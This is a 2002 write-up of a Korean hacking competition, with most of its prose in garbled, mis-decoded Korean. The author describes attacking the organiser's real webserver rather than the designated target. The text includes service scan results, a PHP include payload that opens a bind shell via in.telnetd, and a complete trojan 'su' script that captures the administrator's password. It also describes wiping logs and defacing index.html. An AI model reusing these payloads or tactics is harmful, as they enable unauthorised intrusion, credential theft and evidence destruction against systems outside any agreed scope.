- WOKSDOME Global Hacking Competition - =============================================================================================== Thank you for your participation. The informations on the target server are shown below: IP Address of Target server : 210.183.179.112 Target html(to alter) : the firt page screen (index.html) An Individual (or team) who first in time changes the index.html file by writing his/her own Registration number, ID, Identification No, and email on it will be a winner. P.S: À½... ³ªÁß¿¡ Á¦°¡ Çß´ø ÀÛ¾÷À» Àؾî¹ö¸±±îºÁ ÀÌ·¸°Ô ³²°ÜµÓ´Ï´Ù. Âü°í·Î, ¾Æ¹«·¸°Ô³ª ¸·½á¼ ±ÛÀÇ µÎ¼°¡ ¾øÀ½. --; =============================================================================================== ¸ÕÀú 210.183.179.112¹ø Server°¡ °ø°³µÇ¾ú½À´Ï´Ù. °ø°³Çü smoothwall ÇÁ·Î±×·¥ÀÌ ¼³Ä¡µÇ¾î ÀÖ´õ±º¿ä. ¹°·Ð port´Â 81¹ø Çϳª¿´½À´Ï´Ù. ¸ÕÀú ServerÀÇ Á¤º¸¸¦ Á¶È¸Çغ» °á°ú, mod_ssl Ãë¾àÇÑ ¹öÀüÀ» »ç¿ëÇÏ°í ÀÖ´õ±º¿ä. SSL°ú TLS ÇÁ·ÎÅäÄÝÀÇ ¸ðµâ»çÀÌ¿¡ remote buffer overflow Ãë¾àÁ¡Àº ÀÌ¹Ì ÀÎÅÍ³Ý»ó¿¡ ¹ßÇ¥µÇ¾ú½À´Ï´Ù. Report Title: "Apache mod_ssl 2.8.3/Apache-SSL Buffer Overflow Vulnerability" ÀÔ´Ï´Ù. ½ÇÁ¦ source¸¦ ºÐ¼®Çغ» °á°ú ´Ù¸¥ report¿¡¼ Áõ¸íÇϵíÀÌ Ãë¾àÁ¡Àº Á¸ÀçÇÏ´õ±º¿ä. --- ssl_util_ssl.h: -------------------------------------------------------------------------- #define SSL_SESSION_MAX_DER 1024*10 --- ssl_scache_dbm.c: ------------------------------------------------------------------------ BOOL ssl_scache_dbm_store(server_rec *s, UCHAR *id, int idlen, time_t expiry, SSL_SESSION *sess) { ... UCHAR ucaData[SSL_SESSION_MAX_DER]; ... ucp = ucaData; nData = i2d_SSL_SESSION(sess, &ucp); ---------------------------------------------------------------------------------------------- ±×·¯³ª exploitÇϱ⿡´Â ¸î°¡Áö ³°üÀÌ ÀÖ¾ú½À´Ï´Ù. ±×Áß °¡Àå Ä¡¸íÀûÀ̾ú´ø°ÍÀº Ãë¾àÁ¡À» ÀÌ¿ëÇϱâ À§ÇØ ¸ÕÀú ȹµæÇØ¾ß ÇÏ´Â Certificate Authority (Client, Server°£ÀÇ »óÈ£ÀÎÁõ)ÀÌ ÇÊ¿äÇÏ´Ù´Â Á¡À̾ú½À´Ï´Ù. ÀÌ°ÍÀ» ȹµæÇÏ°í ³ª¸é ssl ¸ðµâÀÇ ±ÇÇÑÀ¸·Î remote command¸¦ ¼öÇàÇÒ¼ö´Â ÀÖ½À´Ï´Ù. ±×·¯³ª ÀÌ°ÍÀº ¸Å¿ì ÈûµçÀÏÀÌ¿´½À´Ï´Ù. ¹®Á¦ÀÇ smoothwall ¿ª½Ã, ¿©·¯°¡Áö Apache ÀÎÁõÀ» °ÅÄ¡´Â°ÍÀº ¸¶Âù°¡Áö¿´½À´Ï´Ù. ÀÌ°ÍÀ» ¹ß°ßÇÑ hackerµéÀº ¸Å¿ì ´Ù¾çÇÑ brute-force¸¦ ½ÃµµÇß°í, ´ë»ó Server´Â °ÅÀÇ ±â¾î´Ù´Ï´Âµí? Çß½À´Ï´Ù. :-( ´Ù¸¥ ¹æ¹ýÀ» ã±â Èûµé´Ù°í »ý°¢ÇÏ°í ÀÖÀ» Âû³ª¿¡ Webserver(http://www.woksdome.org)°¡ ÇØÅ·´çÇß½À´Ï´Ù. ¹°·Ð, Scanningµµ Çѹø ¾ÈÇغ» Server ¿´Áö¸¸ Àü ¸Å¿ì ±Ã±ÝÇß°í ±×ÂÊÀ¸·Î °ü½ÉÀÌ ½ò¸®±â ½ÃÀÛÇß½À´Ï´Ù. ´ÙÀ½Àº Scanning ´ç½Ã Á¤º¸ÀÔ´Ï´Ù. IP Address : 128.134.7.245 Resolved : www.woksdome.org Operating System : Linux - RedHat 7.0 - Open Ports (11): 21 [ Ftp => File Transfer Protocol ] 220 BCA1OOPSRC2 FTP Server (ProFTPD Default Installation-WOW) [www.woksdome.org] *** Anonymous login OK *** 22 [ Ssh => Remote Login Protocol ] SSH-1.99-OpenSSH_2.3.0p1 *** OpenSSH 2.3 Channel Code Off-By-One remote bug OK *** 23 [ Telnet => Remote Login Protocol ] WOWLINUX Release 7.0 (AllLiEs) *** Telnetd remote buffer overflow OK *** 25 [ Smtp => Simple Mail Transfer Protocol ] 220 www.woksdome.org ESMTP Sendmail 8.11.0/8.11.0; Wed, 17 Apr 2002 21:23:37 +0900 *** Sendmail 8.11.0/8.11.0 - Multiple local bug *** 79 [ Finger ] Login Name Tty Idle Login Time Office Office Phone Users (1): root Directory: /root Shell: /bin/bash On since Sat Apr 13 18:25 (KST) on tty1 4 days idle New mail received Wed Apr 17 21:01 2002 (KST) Unread since Tue Apr 16 23:15 2002 (KST) No Plan. root root tty1 4d Apr 13 18:25 *** Cfingerd util-c buffer overflow OK *** Description : The cfingerd package versions 1.4.3 and earlier is vulnerable to a buffer overflow in the util.c file Bugtraq ID/URL : http://xforce.iss.net/static/6744.php 80 [ Http => World Wide Web, HTTP ] HTTP/1.1 200 OK Date: Wed, 17 Apr 2002 12:23:37 GMT Server: Apache/1.3.22 (Unix) PHP/4.1.2 X-Powered-By: PHP/4.1.2 Connection: close Content-Type: text/html PHP module running (web server) Description : PHP is installed on this computer 111 [ SunRPC => SUN Remote Procedure Call ] portmapper, Ver : 2, Proto : TCP, Port : 111 portmapper, Ver : 2, Proto : UDP, Port : 111 nlockmgr, Ver : 1, Proto : UDP, Port : 1024 nlockmgr, Ver : 3, Proto : UDP, Port : 1024 status, Ver : 1, Proto : UDP, Port : 1025 status, Ver : 1, Proto : TCP, Port : 1024 *** Rpc.statd remote format string OK *** 113 [ identd => Authentication Service ] 0 , 0 : X-VERSION : pidentd 3.0.10 for Linux 2.2.5-22smp (Jul 20 2000 15:09:20) *** Xinetd remote buffer overflow OK *** 513 [ Login => Remote login (a la telnet) ] 514 [ Shell => cmd ] 515 [ printer => Printer Spooler ] *** Lprnd remote format string OK *** ³Ê¹«³ªµµ ¸¹Àº Ãë¾àÁ¡ÀÌ Á¸ÀçÇß½À´Ï´Ù. ÀϹÝÀûÀ¸·Î RedHat Default kitÀÇ telnetd´Â Ãë¾àÁ¡À» °¡Áö°í ÀÖ½À´Ï´Ù. Àú´Â exploit Çß½À´Ï´Ù. ¸¶Ä§³» shellÀ» ¾ò°í, Server ³»ºÎÀÇ ¸Å¿ì º¹ÀâÇÑ ÆÄÀϵéÀ» º¸¾Ò½À´Ï´Ù. ^^ LKMÀ» ¼³Ä¡ÇÒ±îÇÏ´Ù ¸»¾Ò½À´Ï´Ù. ¼ÖÁ÷È÷ ´ëȸÀǵµ¿Í ¸Ö¾îÁø°ÍÀÌ ºÐ¸íÇÏ´Ï ... ´õÀÌ»ó º¹ÀâÇÏ°Ô ÇÏ°í ½ÍÁö´Â ¾Ê¾Ò½À´Ï´Ù. ´ÙÀ½ ÀÛ¾÷À¸·Î ½Ã½ºÅÛ»ó¿¡ Á¸ÀçÇÏ´Â ÀúÀÇ ¸ðµç log¸¦ ã¾ÆÁö¿ü½À´Ï´Ù. ÀÌ´Â ´Ü¼øÈ÷ ServerÀÇ ³»ºÎ±ÇÇÑÀ» ȹµæÇϴ°ÍÀ¸·Î ±×ÃƽÀ´Ï´Ù. ±×¸®°í ´ë¿ª´ë¿¡ IP 65¹øÀÇ BSD Server¿Í IP 126¹øÀÇ Router¸¦ ¹ß°ßÇÒ¼ö ÀÖ¾ú½À´Ï´Ù. ¶ó¿ìÅÍ Æнº¿öµå´Â Á¤¸» ½±´õ±º¿ä. "root" ÀϹÝÀûÀÎ ÃßÃøÀ¸·Îµµ °¡´ÉÇѵí Çß½À´Ï´Ù. 65¹øÀÇ °ø°ÝÀº º¸·ùÇϱâ·Î Çß½À´Ï´Ù. ¹°·Ð ¶ó¿ìÅÍÀÇ enable passµµ ¸ð¸£°í Àֱ⠶§¹®¿¡ °ü¸®ÀÚÂÊÀÇ Server Password¸¦ ¾ò´Â°ÍÀÌ Áß¿äÇß½À´Ï´Ù. Àú´Â ´Ù½Ã Webserver¸¦ °ø°ÝÇغýÀ´Ï´Ù. À¥ÂÊÀ» º¸´Ï Á¤¸» Ãë¾àÇß½À´Ï´Ù. --; board µð·ºÅ丮 °æ·Î¿¡´Â index page ÀÚü°¡ ¾ø´õ±º¿ä. =============================================================================================== Parent Directory 16-Apr-2002 18:21 - admin.php 10-Apr-2002 23:44 2k admin_list.php 10-Apr-2002 23:44 16k admin_viewbody.php 10-Apr-2002 23:44 11k bdeleteform.php 10-Apr-2002 23:44 7k blist.php 10-Apr-2002 23:44 1k bmodifyform.php 10-Apr-2002 23:44 6k board.cfg 10-Apr-2002 23:44 1k board.php3 10-Apr-2002 23:44 1k board.sql 10-Apr-2002 23:44 1k board_css.css 10-Apr-2002 23:44 1k board_files/ 06-Apr-2002 19:45 - board_icon.zip/ 10-Apr-2002 07:33 - board_icon/ 09-Apr-2002 08:55 - boardadmin.sql 10-Apr-2002 23:44 1k bpostform.php 10-Apr-2002 23:44 3k breplyform.php 10-Apr-2002 23:44 5k bviewbody.php 10-Apr-2002 23:44 13k con_bbs.sql 10-Apr-2002 23:44 1k dbconn.php 10-Apr-2002 23:44 1k del_mul_proc.php 10-Apr-2002 23:44 1k delete.php 10-Apr-2002 23:44 3k deleteform.php 10-Apr-2002 23:44 7k edit.html 10-Apr-2002 23:44 31k editimg/ 06-Apr-2002 21:03 - editor.html 10-Apr-2002 23:44 6k footer.inc 10-Apr-2002 23:44 1k get.php 10-Apr-2002 23:44 4k header.inc 10-Apr-2002 23:44 1k htmlact.php 10-Apr-2002 23:44 5k image/ 06-Apr-2002 21:03 - list.inc 10-Apr-2002 23:45 15k list.php 10-Apr-2002 23:45 7k list_admin.php 10-Apr-2002 23:45 1k menu_modify.php 10-Apr-2002 23:45 1k menu_modifyform.php 10-Apr-2002 23:45 24k modify.php 10-Apr-2002 23:45 3k modifyform.php 10-Apr-2002 23:45 7k modifyform_admin.php 10-Apr-2002 23:45 13k post.php 10-Apr-2002 23:45 4k post_admin.php 10-Apr-2002 23:45 4k postform.php 10-Apr-2002 23:45 7k postform_admin.php 10-Apr-2002 23:45 4k reply.php 10-Apr-2002 23:45 2k reply_admin.php 10-Apr-2002 23:45 7k replyform.php 10-Apr-2002 23:45 7k replyform_admin.php 10-Apr-2002 23:45 6k select.php 10-Apr-2002 23:45 5k sendmail.php 10-Apr-2002 23:45 11k up_image/ 10-Apr-2002 07:33 - url_autolink.inc 10-Apr-2002 23:45 2k user_function.inc 10-Apr-2002 23:45 4k view_list.php 10-Apr-2002 23:45 16k view_list_admin.php 10-Apr-2002 23:45 16k view_reply.php 10-Apr-2002 23:45 15k viewbody.php 10-Apr-2002 23:45 7k viewbody_admin.php 10-Apr-2002 23:45 14k =============================================================================================== ¿ì¼± ÀÌÁßÀÇ ¸î°³ÀÇ ÆÄÀÏÀ» °Ë»çÇغýÀ´Ï´Ù. ±×¸®°í ±Ý»õ Ãë¾àÁ¡À» ã¾Æ³¾¼ö ÀÖ¾ú½À´Ï´Ù. ±×°ÍÀº board ¼³Á¤ÆÄÀÏÀ» ÂüÁ¶Çϴ°Í, ¹Ù·Î Ãë¾àÁ¡ÀÌ ÀϾ´õ±º¿ä. À§¿¡ board.cfg°¡ º¸ÀÔ´Ï´Ù. Àú´Â Çѹø ½ÇÁ¦ PATH ´ë·Î cfg¸¦ Àоî¿À´Â°Ô °¡´ÉÇÑÁö È®ÀÎÇغ¸¾Ò½À´Ï´Ù. "?code=/usr/local/apache/htdocs/board/board" ÀÌ·±... "?code=board"¿Í °°Àº °á°ú¸¦ Ãâ·ÂÇØÁÝ´Ï´Ù. ÀÌ·Î½á °ø°ÝÀÇ °¡´É¼ºÀÌ Áõ¸íµÇ¾ú½À´Ï´Ù. ftp¿¡ Á¢¼ÓÇÏ¿´½À´Ï´Ù. anonymous·Î ÆÄÀϾ÷·Îµå°¡ °¡´ÉÇÑ°ÍÀº À§ÀÇ Scan °á°ú¸¦ Åä´ë·Î ¾Ë¼ö ÀÖ½À´Ï´Ù. ±×°÷¿¡ Á¦°¡ ¸¸µçÀÓÀÇÀÇ cfg¸¦ ¾÷·Îµå ÇÕ´Ï´Ù. ³»¿ëÀº ´ÙÀ½°ú °°ÀÌ ´Ü¼øÇß½À´Ï´Ù. ... system("echo \"#!/bin/sh\n/bin/bash -i\n\" >/tmp/test;chmod 711 /tmp/test"); system("/usr/sbin/in.telnetd -debug 60177 -L/tmp/test"); ?> ±×¸®°í ÀÌ cfgÆÄÀÏÀ» Àоîµé¿´½À´Ï´Ù. "?code=/var/ftp/code" ¾ÆÁÖ ½±°Ô WebserverÀÇ 60177¹øÀÇ Æ÷Æ®°¡ ¿·È½À´Ï´Ù. Àú´Â ´Ù½Ã Server¿¡ Á¢¼ÓÇÒ¼ö ÀÖ¾ú½À´Ï´Ù. ±×¸®°í ³»ºÎÀÇ setuid Ãë¾àÁ¡À¸·Î root ±ÇÇÑÀ» ¾ò¾ú½À´Ï´Ù. ¸¶Âù°¡Áö·Î °ü·Ã log¸¦ ã¾ÆÁö¿ü½À´Ï´Ù. À̹ø¿¡´Â Àå³³¢°¡ ¹ßµ¿ÇÏ¿© ½ÇÁ¦·Î °ü¸®ÀÚ°¡ ¾î´À Á¤µµ±îÁö °ü¸®ÇÏ´ÂÁö¸¦ »ìÆ캸¾Ò½À´Ï´Ù. index.html¿¡ Èò»öÆùÆ®·Î ´ÙÀ½°ú °°ÀÌ º¯°æÇÏ¿´½À´Ï´Ù. Âü°í·Î ¾Æ·¡È¸éÀº ´ëȸ ù³¯Àú³áºÎÅÍ ¸¶Áö¸·³¯ ¿ÀÀü±îÁö ±×´ë·Î¿´½À´Ï´Ù. woksdome1.jpg °ü¸®ÀÚ´Â ÀüÇô ½Å°æ¾²Áö ¾ÊÀºµíÇÕ´Ï´Ù. :-] ¾î·µç Àú´Â °ü¸®ÀÚ°¡ »ç¿ëÁßÀÎ Password°¡ ÇÊ¿äÇÏ´Ù°í »ý°¢ÇÏ¿´½À´Ï´Ù. ±× ÀÌÀ¯´Â °ü¸®ÁßÀÎ Serverµé°£ÀÇ Password´Â °ÅÀÇ ºñ½ÁÇÑ°ÍÀ̳ª ¾Æ´Ï¸é °°Àº°ÍÀ» »ç¿ëÇϱ⠶§¹®ÀÌÁÒ. óÀ½¿£ shadow file¸¦ »©³»¼ crackÀ» Çұ »ý°¢Çغ¸¾Ò½À´Ï´Ù. ÇÏÁö¸¸, ÀÌ°ÍÀº Á¤¸» ¾öû³ ½Ã°£À» ¿ä±¸ÇÒ°Í °°¾Ò½À´Ï´Ù. ±×·¡¼ Àú´Â ´Ù¸¥ ¹æ¹ýÀ» »ý°¢Çغ¸¾Ò½À´Ï´Ù. ¿ì¼± ´Ù¸¥ »ç¶÷ÀÇ Á¢¼ÓÀ» ¸·±âÀ§ÇØ? ´ÙÀ½°ú °°ÀÌ ¾à°£ÀÇ daemonÀ» Á¤¸®ÇÏ°í permissionÀ» Á¶Á¤Çß½À´Ï´Ù. - board/ board_en/ permission check && touch index.html - Anonymous login closed - Fingerd port closed - SunRpcd port closed - Lprnd port closed ±×¸®°í, ¸¶Áö¸·³¯ ¿ÀÀü 10½Ã±îÁö ±â´Ù·È½À´Ï´Ù. Àú´Â ´ÙÀ½ source¸¦ ½ÇÇàÇÏ¿© Àá½Ãµ¿¾È su ÇÁ·Î±×·¥À» Æ®·ÎÀ̸ñ¸¶·Î º¯°æ½ÃÄ×½À´Ï´Ù. --- su.c source ------------------------------------------------------------------------------ #!/bin/sh # make fake SU file ;-) (printf "\r\nNULL\r\n")|/bin/su;mv /bin/su /bin/su.bak cat > /bin/su.c << EOF #include#include main (int argc,char *argv[]) { FILE *fp; char passwd[20]; printf("Password: "); system("stty -echo"); scanf("%s",passwd); sleep(2); printf("\nsu: incorrect password\n"); system("stty echo"); if((fp=fopen("//usr//local//apache//htdocs//pass","a"))==NULL) { exit(0); } fprintf(fp, "ID : %s\n",argv[1]); fprintf(fp, "PASSWD : %s\n", passwd); fclose(fp); system("/bin/fake"); } EOF # fake command :-D cat > /bin/fake.c << EOF main() { setuid(0); setgid(0); system("mv /bin/su.bak /bin/su;rm -rf /bin/fake"); } EOF # Last Setting mv /bin/su /bin/su.bak gcc -o /bin/su /bin/su.c && rm -rf /bin/su.c gcc -o /bin/fake /bin/fake.c && rm -rf /bin/fake.c chmod 4755 /bin/fake; chmod 4755 /bin/su # EOF ---------------------------------------------------------------------------------------------- ¹®Á¦´Â °ü¸®ÀÚ°¡ su command¸¦ ½ÇÇàÇÒ¼ö ÀÖµµ·Ï Çϴ°ÍÀÌ¿´½À´Ï´Ù. ¸ÕÀú login µÇÀÖ´ø "kdworks" »ç¿ëÀÚ¸¦ kill Çß½À´Ï´Ù. ±×¸®°í, ´Ù½Ã login Çϱ⸦ ±â´Ù·È½À´Ï´Ù. ¾Æ¹«·¡µµ ¹Ù·Î login ÇÏÁø ¾Ê´õ±º¿ä. ±×·¡¼ ´Ù¸¥ ¹æ¹ýÀ» »ý°¢Çغ¸¾Ò½À´Ï´Ù. ¸ÕÀú, °ü¸®ÀÚ°¡ ·Î±×ÀÎÇÏ¿© su command¸¦ ½ÇÇàÇÒ¼ö ÀÖµµ·Ï Àú´Â ´ÙÀ½°ú °°ÀÌ WOKSDOME WebserverÀÇ page¸¦ Àá½Ãµ¿¾È º¯°æÇÏ¿´½À´Ï´Ù. woksdome2.jpg chattr ÀбâÀü¿ë mode¸¦ ¸¸µé¾îµÎ°í "/usr/local/apache/htdocs/pass" ÆÄÀÏÀÌ »ý¼ºµÉ¶§±îÁö ±â´Ù·È½À´Ï´Ù. ¸¶Ä§³» Á¦ ¿¹»ó´ë·Î °ü¸®ÀÚ´Â 5ºÐµµ ¾ÈµÇ¾î ·Î±×ÀÎÇÏ¿´½À´Ï´Ù. su commandÈÄ Æнº¿öµå¸¦ ¶Ç¹Ú¶Ç¹Ú Á¤È®È÷ ³ÖÀ¸¼Ì´õ±º¿ä. :-) ID : - PASSWD : xxxxxxxx Àú´Â ±× ÆÄÀÏÀ» Àоîµé¿© °ü¸®ÀÚ ±ÇÇÑÀÇ Password¸¦ ¾ò¾ú½À´Ï´Ù. ±×ÈÄ ¹Ù·Î chattrÀ» unsetÇÑÈÄ ¾òÀº Password¸¦ ´Ù¸¥ ServerÀÇ ÀÎÁõâ¿¡ ´ëÀÔÇغ¸¾Ò½À´Ï´Ù. À½... ±×·¯³ª °á°ú´Â WOKSDOME WebServerÀÇ Password´Â ±× Webserver Password¿¡ ±¹ÇѵȰÍÀ̾ú½À´Ï´Ù. ¿ø·¡ÀÇ ¸ñÀû´ë·Î Router enable pass¸¦ ¾ò´Â°ÍÀº ºÒ°¡´ÉÇß°í ¶Ç, ´Ù¸¥ ServerÀÇ Password ÀÎÁõ (ƯÈ÷ 112¹ø)À» Åë°úÇÒ¼ö ¾ø¾ú½À´Ï´Ù. ¹°·Ð ServerÀÇ log´Â Áö¼ÓÀûÀ¸·Î Á¤¸®ÇÏ¿´½À´Ï´Ù. :-D Âü°í·Î, Àú´Â 112¹øÀ» °ø°ÝÇϱâ À§ÇØ? WebserverÀÇ Çʿ伺À» ´À²¼½À´Ï´Ù. :-p ±× ´ÙÀ½ ³»¿ëºÎÅÍ´Â Secret ! -- By "you dong-hun" (Xpl017Elz), in INetCop(c). home? http://x82.i21c.net - :-p